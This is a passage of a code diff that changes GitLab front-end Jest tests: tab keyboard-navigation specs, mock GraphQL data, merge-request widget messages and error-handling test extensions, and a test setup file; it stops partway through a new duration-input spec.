setHTMLFixture(tabsFixture); + + const tabsEl = findByTestId('tabs'); + tabShownEventSpy = jest.fn(); + tabsEl.addEventListener(TAB_SHOWN_EVENT, tabShownEventSpy); + + glTabs = new GlTabsBehavior(tabsEl); + }); + + it('instantiates', () => { + expect(glTabs).toEqual(expect.any(GlTabsBehavior)); + }); + + it('sets the active tab', () => { + expectActiveTabAndPanel('foo'); + }); + + it(`does not fire an initial ${TAB_SHOWN_EVENT} event`, () => { + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + + describe('clicking on an inactive tab', () => { + beforeEach(() => { + findTab('bar').click(); + }); + + it('changes the active tab', () => { + expectActiveTabAndPanel('bar'); + }); + + it('deactivates the previously active tab', () => { + expectInactiveTabAndPanel('foo'); + }); + + it(`dispatches a ${TAB_SHOWN_EVENT} event`, () => { + expectGlTabShownEvent('bar'); + }); + }); + + describe('clicking on the active tab', () => { + beforeEach(() => { + findTab('foo').click(); + }); + + it('does nothing', () => { + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + }); + + describe('keyboard navigation', () => { + it.each(['ArrowRight', 'ArrowDown'])('pressing %s moves to next tab', (code) => { + expectActiveTabAndPanel('foo'); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('bar'); + expectInactiveTabAndPanel('foo'); + expectGlTabShownEvent('bar'); + tabShownEventSpy.mockClear(); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('qux'); + expectInactiveTabAndPanel('bar'); + expectGlTabShownEvent('qux'); + tabShownEventSpy.mockClear(); + + // We're now on the last tab, so the active tab should not change + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('qux'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + + it.each(['ArrowLeft', 'ArrowUp'])('pressing %s moves to previous tab', (code) => { + // First, make the last tab active + findTab('qux').click(); + tabShownEventSpy.mockClear(); + + // Now start moving backwards + expectActiveTabAndPanel('qux'); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('bar'); + expectInactiveTabAndPanel('qux'); + expectGlTabShownEvent('bar'); + tabShownEventSpy.mockClear(); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('foo'); + expectInactiveTabAndPanel('bar'); + expectGlTabShownEvent('foo'); + tabShownEventSpy.mockClear(); + + // We're now on the first tab, so the active tab should not change + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + }); + + describe('destroying', () => { + beforeEach(() => { + glTabs.destroy(); + }); + + it('removes interactivity', () => { + const inactiveTab = findTab('bar'); + + // clicks do nothing + inactiveTab.click(); + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + + // keydown events do nothing + triggerKeyDown('ArrowDown', inactiveTab); + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + }); + + describe('activateTab method', () => { + it.each` + tabState | name + ${'active'} | ${'foo'} + ${'inactive'} | ${'bar'} + `('can programmatically activate an $tabState tab', ({ name }) => { + glTabs.activateTab(findTab(name)); + expectActiveTabAndPanel(name); + expectGlTabShownEvent(name, 'foo'); + }); + }); + }); + + describe('using aria-controls instead of href to link tabs to panels', () => { + beforeEach(() => { + setHTMLFixture(tabsFixture); + + const tabsEl = findByTestId('tabs'); + ['foo', 'bar', 'qux'].forEach((name) => { + const tab = findTab(name); + const panel = findPanel(name); + + tab.setAttribute('href', '#'); + tab.setAttribute('aria-controls', panel.id); + }); + + glTabs = new GlTabsBehavior(tabsEl); + }); + + it('connects the panels to their tabs correctly', () => { + findTab('bar').click(); + + expectActiveTabAndPanel('bar'); + expectInactiveTabAndPanel('foo'); + }); + }); +}); diff --git a/spec/frontend/terraform/components/terraform_list_spec.js b/spec/frontend/terraform/components/terraform_list_spec.js index c622f86072d..8e565df81ae 100644 --- a/spec/frontend/terraform/components/terraform_list_spec.js +++ b/spec/frontend/terraform/components/terraform_list_spec.js @@ -23,6 +23,7 @@ describe('TerraformList', () => { const apolloQueryResponse = { data: { project: { + id: '1', terraformStates, }, }, diff --git a/spec/frontend/test_setup.js b/spec/frontend/test_setup.js index 40f68c6385f..4fe51db8412 100644 --- a/spec/frontend/test_setup.js +++ b/spec/frontend/test_setup.js @@ -1,30 +1,10 @@ -import { config as testUtilsConfig } from '@vue/test-utils'; -import * as jqueryMatchers from 'custom-jquery-matchers'; -import Vue from 'vue'; -import 'jquery'; -import { setGlobalDateToFakeDate } from 'helpers/fake_date'; -import setWindowLocation from 'helpers/set_window_location_helper'; -import { TEST_HOST } from 'helpers/test_constants'; -import Translate from '~/vue_shared/translate'; -import { loadHTMLFixture, setHTMLFixture } from './__helpers__/fixtures'; -import { initializeTestTimeout } from './__helpers__/timeout'; -import customMatchers from './matchers'; -import { setupManualMocks } from './mocks/mocks_helper'; +/* Setup for unit test environment */ +import 'helpers/shared_test_setup'; +import { initializeTestTimeout } from 'helpers/timeout'; -import './__helpers__/dom_shims'; -import './__helpers__/jquery'; -import '~/commons/bootstrap'; +jest.mock('~/lib/utils/axios_utils', () => jest.requireActual('helpers/mocks/axios_utils')); -// This module has some fairly decent visual test coverage in it's own repository. -jest.mock('@gitlab/favicon-overlay'); - -process.on('unhandledRejection', global.promiseRejectionHandler); - -setupManualMocks(); - -// Fake the `Date` for the rest of the jest spec runtime environment. -// https://gitlab.com/gitlab-org/gitlab/-/merge_requests/39496#note_503084332 -setGlobalDateToFakeDate(); +initializeTestTimeout(process.env.CI ? 6000 : 500); afterEach(() => // give Promises a bit more time so they fail the right test @@ -33,71 +13,3 @@ afterEach(() => jest.runOnlyPendingTimers(); }), ); - -initializeTestTimeout(process.env.CI ? 6000 : 500); - -Vue.config.devtools = false; -Vue.config.productionTip = false; - -Vue.use(Translate); - -// convenience wrapper for migration from Karma -Object.assign(global, { - loadFixtures: loadHTMLFixture, - setFixtures: setHTMLFixture, -}); - -const JQUERY_MATCHERS_TO_EXCLUDE = ['toHaveLength', 'toExist']; - -// custom-jquery-matchers was written for an old Jest version, we need to make it compatible -Object.entries(jqueryMatchers).forEach(([matcherName, matcherFactory]) => { - // Exclude these jQuery matchers - if (JQUERY_MATCHERS_TO_EXCLUDE.includes(matcherName)) { - return; - } - - expect.extend({ - [matcherName]: matcherFactory().compare, - }); -}); - -expect.extend(customMatchers); - -testUtilsConfig.deprecationWarningHandler = (method, message) => { - const ALLOWED_DEPRECATED_METHODS = [ - // https://gitlab.com/gitlab-org/gitlab/-/issues/295679 - 'finding components with `find` or `get`', - - // https://gitlab.com/gitlab-org/gitlab/-/issues/295680 - 'finding components with `findAll`', - ]; - if (!ALLOWED_DEPRECATED_METHODS.includes(method)) { - global.console.error(message); - } -}; - -Object.assign(global, { - requestIdleCallback(cb) { - const start = Date.now(); - return setTimeout(() => { - cb({ - didTimeout: false, - timeRemaining: () => Math.max(0, 50 - (Date.now() - start)), - }); - }); - }, - cancelIdleCallback(id) { - clearTimeout(id); - }, -}); - -beforeEach(() => { - // make sure that each test actually tests something - // see https://jestjs.io/docs/en/expect#expecthasassertions - expect.hasAssertions(); - - // Reset the mocked window.location. This ensures tests don't interfere with - // each other, and removes the need to tidy up if it was changed for a given - // test. - setWindowLocation(TEST_HOST); -}); diff --git a/spec/frontend/token_access/mock_data.js b/spec/frontend/token_access/mock_data.js index 14d7b00cb6d..0f121fd1beb 100644 --- a/spec/frontend/token_access/mock_data.js +++ b/spec/frontend/token_access/mock_data.js @@ -1,6 +1,7 @@ export const enabledJobTokenScope = { data: { project: { + id: '1', ciCdSettings: { jobTokenScopeEnabled: true, __typename: 'ProjectCiCdSetting', @@ -13,6 +14,7 @@ export const enabledJobTokenScope = { export const disabledJobTokenScope = { data: { project: { + id: '1', ciCdSettings: { jobTokenScopeEnabled: false, __typename: 'ProjectCiCdSetting', @@ -39,12 +41,14 @@ export const projectsWithScope = { data: { project: { __typename: 'Project', + id: '1', ciJobTokenScope: { __typename: 'CiJobTokenScopeType', projects: { __typename: 'ProjectConnection', nodes: [ { + id: '2', fullPath: 'root/332268-test', name: 'root/332268-test', }, @@ -75,10 +79,17 @@ export const removeProjectSuccess = { export const mockProjects = [ { + id: '1', name: 'merge-train-stuff', fullPath: 'root/merge-train-stuff', isLocked: false, __typename: 'Project', }, - { name: 'ci-project', fullPath: 'root/ci-project', isLocked: true, __typename: 'Project' }, + { + id: '2', + name: 'ci-project', + fullPath: 'root/ci-project', + isLocked: true, + __typename: 'Project', + }, ]; diff --git a/spec/frontend/transfer_edit_spec.js b/spec/frontend/transfer_edit_spec.js index ad8c9c68f37..4091d753fe5 100644 --- a/spec/frontend/transfer_edit_spec.js +++ b/spec/frontend/transfer_edit_spec.js @@ -4,11 +4,11 @@ import { loadHTMLFixture } from 'helpers/fixtures'; import setupTransferEdit from '~/transfer_edit'; describe('setupTransferEdit', () => { - const formSelector = '.js-project-transfer-form'; - const targetSelector = 'select.select2'; + const formSelector = '.js-group-transfer-form'; + const targetSelector = '#new_parent_group_id'; beforeEach(() => { - loadHTMLFixture('projects/edit.html'); + loadHTMLFixture('groups/edit.html'); setupTransferEdit(formSelector, targetSelector); }); @@ -17,8 +17,8 @@ describe('setupTransferEdit', () => { }); it('enables submit button when selection changes to non-empty value', () => { - const nonEmptyValue = $(formSelector).find(targetSelector).find('option').not(':empty').val(); - $(formSelector).find(targetSelector).val(nonEmptyValue).trigger('change'); + const lastValue = $(formSelector).find(targetSelector).find('.dropdown-content li').last(); + $(formSelector).find(targetSelector).val(lastValue).trigger('change'); expect($(formSelector).find(':submit').prop('disabled')).toBeFalsy(); }); diff --git a/spec/frontend/vue_mr_widget/components/extensions/utils_spec.js b/spec/frontend/vue_mr_widget/components/extensions/utils_spec.js new file mode 100644 index 00000000000..64e802c4fa5 --- /dev/null +++ b/spec/frontend/vue_mr_widget/components/extensions/utils_spec.js @@ -0,0 +1,18 @@ +import { generateText } from '~/vue_merge_request_widget/components/extensions/utils'; + +describe('generateText', () => { + it.each` + text | expectedText + ${'%{strong_start}Hello world%{strong_end}'} | ${'<span class="gl-font-weight-bold">Hello world</span>'} + ${'%{success_start}Hello world%{success_end}'} | ${'<span class="gl-font-weight-bold gl-text-green-500">Hello world</span>'} + ${'%{danger_start}Hello world%{danger_end}'} | ${'<span class="gl-font-weight-bold gl-text-red-500">Hello world</span>'} + ${'%{critical_start}Hello world%{critical_end}'} | ${'<span class="gl-font-weight-bold gl-text-red-800">Hello world</span>'} + ${'%{same_start}Hello world%{same_end}'} | ${'<span class="gl-font-weight-bold gl-text-gray-700">Hello world</span>'} + ${'%{small_start}Hello world%{small_end}'} | ${'<span class="gl-font-sm">Hello world</span>'} + ${'%{strong_start}%{danger_start}Hello world%{danger_end}%{strong_end}'} | ${'<span class="gl-font-weight-bold"><span class="gl-font-weight-bold gl-text-red-500">Hello world</span></span>'} + ${'%{no_exist_start}Hello world%{no_exist_end}'} | ${'Hello world'} + ${['array']} | ${null} + `('generates $expectedText from $text', ({ text, expectedText }) => { + expect(generateText(text)).toBe(expectedText); + }); +}); diff --git a/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js b/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js index f965fc32dc1..c30f6f1dfd1 100644 --- a/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js @@ -3,7 +3,6 @@ import CommitEdit from '~/vue_merge_request_widget/components/states/commit_edit const testCommitMessage = 'Test commit message'; const testLabel = 'Test label'; -const testTextMuted = 'Test text muted'; const testInputId = 'test-input-id'; describe('Commits edit component', () => { @@ -64,7 +63,6 @@ describe('Commits edit component', () => { beforeEach(() => { createComponent({ header: `<div class="test-header">${testCommitMessage}</div>`, - 'text-muted': `<p class="test-text-muted">${testTextMuted}</p>`, }); }); @@ -74,12 +72,5 @@ describe('Commits edit component', () => { expect(headerSlotElement.exists()).toBe(true); expect(headerSlotElement.text()).toBe(testCommitMessage); }); - - it('renders text-muted slot correctly', () => { - const textMutedElement = wrapper.find('.test-text-muted'); - - expect(textMutedElement.exists()).toBe(true); - expect(textMutedElement.text()).toBe(testTextMuted); - }); }); }); diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js index 4bdc6c95f22..f3061d792d0 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js @@ -25,7 +25,7 @@ describe('MRWidgetArchived', () => { it('renders information', () => { expect(vm.$el.querySelector('.bold').textContent.trim()).toEqual( - 'This project is archived, write access has been disabled', + 'Merge unavailable: merge requests are read-only on archived projects.', ); }); }); diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js index e1bce7f0474..89de160b02f 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js @@ -12,6 +12,14 @@ describe('MRWidgetConflicts', () => { const findResolveButton = () => wrapper.findByTestId('resolve-conflicts-button'); const findMergeLocalButton = () => wrapper.findByTestId('merge-locally-button'); + const mergeConflictsText = 'Merge blocked: merge conflicts must be resolved.'; + const fastForwardMergeText = + 'Merge blocked: fast-forward merge is not possible. To merge this request, first rebase locally.'; + const userCannotMergeText = + 'Users who can write to the source or target branches can resolve the conflicts.'; + const resolveConflictsBtnText = 'Resolve conflicts'; + const mergeLocallyBtnText = 'Merge locally'; + function createComponent(propsData = {}) { wrapper = extendedWrapper( shallowMount(ConflictsComponent, { @@ -81,16 +89,16 @@ describe('MRWidgetConflicts', () => { }); it('should tell you about conflicts without bothering other people', () => { - expect(wrapper.text()).toContain('There are merge conflicts'); - expect(wrapper.text()).not.toContain('ask someone with write access'); + expect(wrapper.text()).toContain(mergeConflictsText); + expect(wrapper.text()).not.toContain(userCannotMergeText); }); it('should not allow you to resolve the conflicts', () => { - expect(wrapper.text()).not.toContain('Resolve conflicts'); + expect(wrapper.text()).not.toContain(resolveConflictsBtnText); }); it('should have merge buttons', () => { - expect(findMergeLocalButton().text()).toContain('Merge locally'); + expect(findMergeLocalButton().text()).toContain(mergeLocallyBtnText); }); }); @@ -107,17 +115,17 @@ describe('MRWidgetConflicts', () => { }); it('should tell you about conflicts', () => { - expect(wrapper.text()).toContain('There are merge conflicts'); - expect(wrapper.text()).toContain('ask someone with write access'); + expect(wrapper.text()).toContain(mergeConflictsText); + expect(wrapper.text()).toContain(userCannotMergeText); }); it('should allow you to resolve the conflicts', () => { - expect(findResolveButton().text()).toContain('Resolve conflicts'); + expect(findResolveButton().text()).toContain(resolveConflictsBtnText); expect(findResolveButton().attributes('href')).toEqual(path); }); it('should not have merge buttons', () => { - expect(wrapper.text()).not.toContain('Merge locally'); + expect(wrapper.text()).not.toContain(mergeLocallyBtnText); }); }); @@ -134,17 +142,17 @@ describe('MRWidgetConflicts', () => { }); it('should tell you about conflicts without bothering other people', () => { - expect(wrapper.text()).toContain('There are merge conflicts'); - expect(wrapper.text()).not.toContain('ask someone with write access'); + expect(wrapper.text()).toContain(mergeConflictsText); + expect(wrapper.text()).not.toContain(userCannotMergeText); }); it('should allow you to resolve the conflicts', () => { - expect(findResolveButton().text()).toContain('Resolve conflicts'); + expect(findResolveButton().text()).toContain(resolveConflictsBtnText); expect(findResolveButton().attributes('href')).toEqual(path); }); it('should have merge buttons', () => { - expect(findMergeLocalButton().text()).toContain('Merge locally'); + expect(findMergeLocalButton().text()).toContain(mergeLocallyBtnText); }); }); @@ -158,9 +166,7 @@ describe('MRWidgetConflicts', () => { }, }); - expect(wrapper.text().trim().replace(/\s\s+/g, ' ')).toContain( - 'ask someone with write access', - ); + expect(wrapper.text().trim().replace(/\s\s+/g, ' ')).toContain(userCannotMergeText); }); it('should not have action buttons', async () => { @@ -198,9 +204,7 @@ describe('MRWidgetConflicts', () => { }, }); - expect(removeBreakLine(wrapper.text()).trim()).toContain( - 'Merge blocked: fast-forward merge is not possible. To merge this request, first rebase locally.', - ); + expect(removeBreakLine(wrapper.text()).trim()).toContain(fastForwardMergeText); }); }); @@ -236,7 +240,7 @@ describe('MRWidgetConflicts', () => { }); it('should allow you to resolve the conflicts', () => { - expect(findResolveButton().text()).toContain('Resolve conflicts'); + expect(findResolveButton().text()).toContain(resolveConflictsBtnText); expect(findResolveButton().attributes('href')).toEqual(TEST_HOST); }); }); diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js index 016b6b2220b..7082a19a8e7 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js @@ -1,5 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import Vue from 'vue'; +import { GlSprintf } from '@gitlab/ui'; import simplePoll from '~/lib/utils/simple_poll'; import CommitEdit from '~/vue_merge_request_widget/components/states/commit_edit.vue'; import CommitMessageDropdown from '~/vue_merge_request_widget/components/states/commit_message_dropdown.vue'; @@ -487,6 +488,7 @@ describe('ReadyToMerge', () => { const findCommitEditElements = () => wrapper.findAll(CommitEdit); const findCommitDropdownElement = () => wrapper.find(CommitMessageDropdown); const findFirstCommitEditLabel = () => findCommitEditElements().at(0).props('label'); + const findTipLink = () => wrapper.find(GlSprintf); describe('squash checkbox', () => { it('should be rendered when squash before merge is enabled and there is more than 1 commit', () => { @@ -503,10 +505,10 @@ describe('ReadyToMerge', () => { expect(findCheckboxElement().exists()).toBeFalsy(); }); - it('should not be rendered when there is only 1 commit', () => { + it('should be rendered when there is only 1 commit', () => { createComponent({ mr: { commitsCount: 1, enableSquashBeforeMerge: true } }); - expect(findCheckboxElement().exists()).toBeFalsy(); + expect(findCheckboxElement().exists()).toBe(true); }); describe('squash options', () => { @@ -751,6 +753,12 @@ describe('ReadyToMerge', () => { expect(findCommitDropdownElement().exists()).toBeTruthy(); }); }); + + it('renders a tip including a link to docs on templates', () => { + createComponent(); + + expect(findTipLink().exists()).toBe(true); + }); }); describe('Merge request project settings', () => { diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js index 0fb0d5b0b68..4070ca8d8dc 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js @@ -81,7 +81,9 @@ describe('Wip', () => { it('should have correct elements', () => { expect(el.classList.contains('mr-widget-body')).toBeTruthy(); - expect(el.innerText).toContain('This merge request is still a draft.'); + expect(el.innerText).toContain( + "Merge blocked: merge request must be marked as ready. It's still marked as draft.", + ); expect(el.querySelector('button').getAttribute('disabled')).toBeTruthy(); expect(el.querySelector('button').innerText).toContain('Merge'); expect(el.querySelector('.js-remove-draft').innerText.replace(/\s\s+/g, ' ')).toContain( diff --git a/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js b/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js index f95a92c2cb1..3c9f6c2e165 100644 --- a/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js +++ b/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js @@ -32,9 +32,7 @@ describe('TerraformPlan', () => { }); it('diplays the header text with a name', () => { - expect(wrapper.text()).toContain( - `The report ${validPlanWithName.job_name} was generated in your pipelines.`, - ); + expect(wrapper.text()).toContain(`The job ${validPlanWithName.job_name} generated a report.`); }); it('diplays the reported changes', () => { @@ -70,7 +68,7 @@ describe('TerraformPlan', () => { it('diplays the header text with a name', () => { expect(wrapper.text()).toContain( - `The report ${invalidPlanWithName.job_name} failed to generate.`, + `The job ${invalidPlanWithName.job_name} failed to generate a report.`, ); }); diff --git a/spec/frontend/vue_mr_widget/mock_data.js b/spec/frontend/vue_mr_widget/mock_data.js index f0c1da346a1..4538c1320d0 100644 --- a/spec/frontend/vue_mr_widget/mock_data.js +++ b/spec/frontend/vue_mr_widget/mock_data.js @@ -271,8 +271,6 @@ export default { mr_troubleshooting_docs_path: 'help', ci_troubleshooting_docs_path: 'help2', merge_request_pipelines_docs_path: '/help/ci/pipelines/merge_request_pipelines.md', - merge_train_when_pipeline_succeeds_docs_path: - '/help/ci/pipelines/merge_trains.md#startadd-to-merge-train-when-pipeline-succeeds', squash: true, visual_review_app_available: true, merge_trains_enabled: true, diff --git a/spec/frontend/vue_mr_widget/mr_widget_options_spec.js b/spec/frontend/vue_mr_widget/mr_widget_options_spec.js index 550f156d095..8d41f6620ff 100644 --- a/spec/frontend/vue_mr_widget/mr_widget_options_spec.js +++ b/spec/frontend/vue_mr_widget/mr_widget_options_spec.js @@ -3,6 +3,7 @@ import { mount } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; +import * as Sentry from '@sentry/browser'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import { securityReportMergeRequestDownloadPathsQueryResponse } from 'jest/vue_shared/security_reports/mock_data'; @@ -19,10 +20,15 @@ import { SUCCESS } from '~/vue_merge_request_widget/components/deployment/consta import eventHub from '~/vue_merge_request_widget/event_hub'; import MrWidgetOptions from '~/vue_merge_request_widget/mr_widget_options.vue'; import { stateKey } from '~/vue_merge_request_widget/stores/state_maps'; +import StatusIcon from '~/vue_merge_request_widget/components/extensions/status_icon.vue'; import securityReportMergeRequestDownloadPathsQuery from '~/vue_shared/security_reports/graphql/queries/security_report_merge_request_download_paths.query.graphql'; import { faviconDataUrl, overlayDataUrl } from '../lib/utils/mock_data'; import mockData from './mock_data'; -import testExtension from './test_extension'; +import { + workingExtension, + collapsedDataErrorExtension, + fullDataErrorExtension, +} from './test_extensions'; jest.mock('~/api.js'); @@ -892,7 +898,7 @@ describe('MrWidgetOptions', () => { describe('mock extension', () => { beforeEach(() => { - registerExtension(testExtension); + registerExtension(workingExtension); createComponent(); }); @@ -914,7 +920,7 @@ describe('MrWidgetOptions', () => { .find('[data-testid="widget-extension"] [data-testid="toggle-button"]') .trigger('click'); - await Vue.nextTick(); + await nextTick(); expect(api.trackRedisHllUserEvent).toHaveBeenCalledWith('test_expand_event'); }); @@ -926,7 +932,7 @@ describe('MrWidgetOptions', () => { .find('[data-testid="widget-extension"] [data-testid="toggle-button"]') .trigger('click'); - await Vue.nextTick(); + await nextTick(); expect( wrapper.find('[data-testid="widget-extension-top-level"]').find(GlDropdown).exists(), @@ -952,4 +958,50 @@ describe('MrWidgetOptions', () => { expect(collapsedSection.find(GlButton).text()).toBe('Full report'); }); }); + + describe('mock extension errors', () => { + let captureException; + + const itHandlesTheException = () => { + expect(captureException).toHaveBeenCalledTimes(1); + expect(captureException).toHaveBeenCalledWith(new Error('Fetch error')); + expect(wrapper.findComponent(StatusIcon).props('iconName')).toBe('error'); + }; + + beforeEach(() => { + captureException = jest.spyOn(Sentry, 'captureException'); + }); + + afterEach(() => { + registeredExtensions.extensions = []; + captureException = null; + }); + + it('handles collapsed data fetch errors', async () => { + registerExtension(collapsedDataErrorExtension); + createComponent(); + await waitForPromises(); + + expect( + wrapper.find('[data-testid="widget-extension"] [data-testid="toggle-button"]').exists(), + ).toBe(false); + itHandlesTheException(); + }); + + it('handles full data fetch errors', async () => { + registerExtension(fullDataErrorExtension); + createComponent(); + await waitForPromises(); + + expect(wrapper.findComponent(StatusIcon).props('iconName')).not.toBe('error'); + wrapper + .find('[data-testid="widget-extension"] [data-testid="toggle-button"]') + .trigger('click'); + + await nextTick(); + await waitForPromises(); + + itHandlesTheException(); + }); + }); }); diff --git a/spec/frontend/vue_mr_widget/test_extension.js b/spec/frontend/vue_mr_widget/test_extension.js deleted file mode 100644 index 65c1bd8473b..00000000000 --- a/spec/frontend/vue_mr_widget/test_extension.js +++ /dev/null @@ -1,39 +0,0 @@ -import { EXTENSION_ICONS } from '~/vue_merge_request_widget/constants'; - -export default { - name: 'WidgetTestExtension', - props: ['targetProjectFullPath'], - expandEvent: 'test_expand_event', - computed: { - summary({ count, targetProjectFullPath }) { - return `Test extension summary count: ${count} & ${targetProjectFullPath}`; - }, - statusIcon({ count }) { - return count > 0 ? EXTENSION_ICONS.warning : EXTENSION_ICONS.success; - }, - }, - methods: { - fetchCollapsedData({ targetProjectFullPath }) { - return Promise.resolve({ targetProjectFullPath, count: 1 }); - }, - fetchFullData() { - return Promise.resolve([ - { - id: 1, - text: 'Hello world', - icon: { - name: EXTENSION_ICONS.failed, - }, - badge: { - text: 'Closed', - }, - link: { - href: 'https://gitlab.com', - text: 'GitLab.com', - }, - actions: [{ text: 'Full report', href: 'https://gitlab.com', target: '_blank' }], - }, - ]); - }, - }, -}; diff --git a/spec/frontend/vue_mr_widget/test_extensions.js b/spec/frontend/vue_mr_widget/test_extensions.js new file mode 100644 index 00000000000..c7ff02ab726 --- /dev/null +++ b/spec/frontend/vue_mr_widget/test_extensions.js @@ -0,0 +1,99 @@ +import { EXTENSION_ICONS } from '~/vue_merge_request_widget/constants'; + +export const workingExtension = { + name: 'WidgetTestExtension', + props: ['targetProjectFullPath'], + expandEvent: 'test_expand_event', + computed: { + summary({ count, targetProjectFullPath }) { + return `Test extension summary count: ${count} & ${targetProjectFullPath}`; + }, + statusIcon({ count }) { + return count > 0 ? EXTENSION_ICONS.warning : EXTENSION_ICONS.success; + }, + }, + methods: { + fetchCollapsedData({ targetProjectFullPath }) { + return Promise.resolve({ targetProjectFullPath, count: 1 }); + }, + fetchFullData() { + return Promise.resolve([ + { + id: 1, + text: 'Hello world', + icon: { + name: EXTENSION_ICONS.failed, + }, + badge: { + text: 'Closed', + }, + link: { + href: 'https://gitlab.com', + text: 'GitLab.com', + }, + actions: [{ text: 'Full report', href: 'https://gitlab.com', target: '_blank' }], + }, + ]); + }, + }, +}; + +export const collapsedDataErrorExtension = { + name: 'WidgetTestCollapsedErrorExtension', + props: ['targetProjectFullPath'], + expandEvent: 'test_expand_event', + computed: { + summary({ count, targetProjectFullPath }) { + return `Test extension summary count: ${count} & ${targetProjectFullPath}`; + }, + statusIcon({ count }) { + return count > 0 ? EXTENSION_ICONS.warning : EXTENSION_ICONS.success; + }, + }, + methods: { + fetchCollapsedData() { + return Promise.reject(new Error('Fetch error')); + }, + fetchFullData() { + return Promise.resolve([ + { + id: 1, + text: 'Hello world', + icon: { + name: EXTENSION_ICONS.failed, + }, + badge: { + text: 'Closed', + }, + link: { + href: 'https://gitlab.com', + text: 'GitLab.com', + }, + actions: [{ text: 'Full report', href: 'https://gitlab.com', target: '_blank' }], + }, + ]); + }, + }, +}; + +export const fullDataErrorExtension = { + name: 'WidgetTestCollapsedErrorExtension', + props: ['targetProjectFullPath'], + expandEvent: 'test_expand_event', + computed: { + summary({ count, targetProjectFullPath }) { + return `Test extension summary count: ${count} & ${targetProjectFullPath}`; + }, + statusIcon({ count }) { + return count > 0 ? EXTENSION_ICONS.warning : EXTENSION_ICONS.success; + }, + }, + methods: { + fetchCollapsedData({ targetProjectFullPath }) { + return Promise.resolve({ targetProjectFullPath, count: 1 }); + }, + fetchFullData() { + return Promise.reject(new Error('Fetch error')); + }, + }, +}; diff --git a/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap b/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap index 7ce155f6a5d..f414359fef2 100644 --- a/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap +++ b/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap @@ -3,6 +3,7 @@ exports[`Source Editor component rendering matches the snapshot 1`] = ` <div data-editor-loading="" + data-qa-selector="source_editor_container" id="source-editor-snippet_777" > <pre diff --git a/spec/frontend/vue_shared/components/chronic_duration_input_spec.js b/spec/frontend/vue_shared/components/chronic_duration_input_spec.js new file mode 100644 index 00000000000..530d01402c6 --- /dev/null +++ b/spec/frontend/vue_shared/components/chronic_duration_input_spec.js @@ -0,0 +1,390 @@ +import { mount } from '@vue/test-utils'; +import ChronicDurationInput from '~/vue_shared/components/chronic_duration_input.vue'; + +const MOCK_VALUE = 2 * 3600 + 20 * 60; + +describe('vue_shared/components/chronic_duration_input', () => { + let wrapper; + let textElement; + let hiddenElement; + + afterEach(() => { + wrapper.destroy(); + wrapper = null; + textElement = null; + hiddenElement = null; + }); + + const findComponents = () => { + textElement = wrapper.find('input[type=text]').element; + hiddenElement = wrapper.find('input[type=hidden]').element; + }; + + const createComponent = (props = {}) => { + if (wrapper) { + throw new Error('There should only be one wrapper created per test'); + } + + wrapper = mount(ChronicDurationInput, { propsData: props }); + findComponents(); + }; + + describe('value', () => { + it('has human-readable output with value', () => { + createComponent({ value: MOCK_VALUE }); + + expect(textElement.value).toBe('2 hrs 20 mins'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + + it('has empty output with no value', () => { + createComponent({ value: null }); + + expect(textElement.value).toBe(''); + expect(hiddenElement.value).toBe(''); + }); + }); + + describe('change', () => { + const createAndDispatch = async (initialValue, humanReadableInput) => { + createComponent({ value: initialValue }); + await wrapper.vm.$nextTick(); + textElement.value = humanReadableInput; + textElement.dispatchEvent(new Event('input')); + }; + + describe('when starting with no value and receiving human-readable input', () => { + beforeEach(() => { + createAndDispatch(null, '2hr20min'); + }); + + it('updates hidden field', () => { + 